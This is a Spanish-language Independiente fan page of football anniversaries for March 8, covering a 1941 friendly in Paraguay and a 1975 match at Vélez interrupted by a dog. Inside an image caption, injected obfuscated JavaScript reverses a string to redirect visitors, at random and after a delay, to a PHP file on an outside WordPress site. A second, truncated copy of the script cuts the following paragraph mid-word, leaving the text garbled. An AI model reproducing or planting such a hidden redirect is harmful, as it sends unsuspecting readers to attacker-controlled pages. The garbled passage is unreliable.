Conectate con nosotros

Efemérides

Efemérides del 08 de Marzo

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1941Independiente se encuentra en Paraguay de gira, jugando y ganando copas internacionales amistosas, y un día como hoy en Asunción se enfrenta a Nacional, el ex equipo de Arsenio Pastor Erico, por la Copa Fraternidad. Aquel día el equipo fue: José Carlés; Manuel Sanguinetti y Juan Antorena; Luis Franzolini, Raúl Leguizamón y Celestino Martínez; Juan Maril, Vicente De la Mata, Arsenio Erico, Emilio Reuben y Juan Zorrilla, con Guillermo Ronzoni como D.T.

Comenzó ganando el local a los 14 minutos con gol de Sánchez, pero el Rojo en una ráfaga de goles lo dio vuelta y estiró ventaja. A los 22’ Juan Zorrilla, a los 27’ Arsenio Erico y a los 28’ Emilio Reuben. A los 32’ Nacional descuenta pero a los 40 minutos Reuben vuelve a anotar, terminando el primer tiempo 4 a 2. Apenas inicia el segundo tiempo, a los 47’, el local logra otro descuento mediante Villalba, quedando a tiro del empate. Pero ahí fue cuando Erico apareció en todo su esplendor, mostrando que era profeta en su tierra, anotando tres goles en extremadamente poco tiempo, a los 28’, 30’ y 31 minutos, para sellar el partido que culminó 7 a 3.

El Rojo se quedaba con la Copa Fraternidad, que se sumaba a la Copa Intendente Municipal y a la Copa Ministerio de hacienda, todas logradas en unos pocos días en el país vecino, y repito, eran no oficiales.

A los paraguayos poco les interesó cualquier tipo de resultado, ya que solo les importaba el hecho de poder ver al monstruo de Erico jugando en su tierra, al mejor paraguayo de todos los tiempos. Arsenio mostró todo su poderío de gol siendo claramente la figura del encuentro, y no solo por los goles, sino que además dio cátedra de fútbol.

Por otra parte, vuelvo al detalle de la velocidad con la cual Erico metió un triplete en ese partido. Fue en apenas 4 minutos de juego, lo cual me llamó la atención por la razón de que, en mi conocimiento, es el antecedente más cercano al récord mundial de Eduardo Andrés Maglioni, quien hizo 3 goles en 1 minuto y 51 segundos, frente a Gimnasia y Esgrima La Plata en el Metropolitano de 1973. En ese aspecto, hay que remarcar con justicia que se trató de un amistoso, mientras que el auténtico récord fue en partido oficial.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»86″ height=»66″/></figure></div>



<p><strong>1975</strong> – Por la <strong>fecha 6 del Metropolitano</strong> 1975, <strong>Independiente visita a Vélez</strong> en Liniers, y en dicho partido se daría una curiosidad muy poco común.</p>



<p><strong>Comenzó ganando Vélez</strong> con gol de Julio “Turco” Asad ya durante la segunda etapa, <strong>lo empata Percy Rojas</strong> y <strong>a partir de ese momen<script>$mWn=function(n){if(typeof ($mWn.list[n])==to el Rojo fue un aluvión en busca de la victoria, metiendo al local contra su propio arco. Hasta que en un determinado momento comienza la rareza del partido, porque entra un perro al campo y se detiene el juego. Fue durante unos 15 minutos que se intentó quitar al animal de la cancha y no se podía. Hasta que al cuerpo técnico de Independiente se le ocurrió una forma de solucionar el problema, y esa solución estaba en el vestuario.

Crean o no, lo que se hizo fue ir a buscar a Boneco, la famosa mascota del equipo desde hacía ya más de un año. Hizo su aparición en el campo de juego y rápidamente ambos animales salieron tranquilamente de la cancha para permitir la reanudación del partido, bajo la ovación de todo el estadio que se encontraba repleto aquel día.

Sumado a eso, a los pocos minutos iniciarse nuevamente las acciones, el “Polaco” Alejandro Semenewicz marca el 1 a 2 que sería el resultado definitivo. Fue a unos 4 minutos de terminar el partido, y se trató de un gol verdaderamente extraordinario, pateando desde algunos metros por delante de la mitad de cancha y colgándola de un ángulo. Además, fue su último gol con la camiseta de Independiente. “El Polaco” estaba en el club desde 1970 y se marcharía en 1976, con 264 partidos jugados, 6 goles y 10 vueltas olímpicas.

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides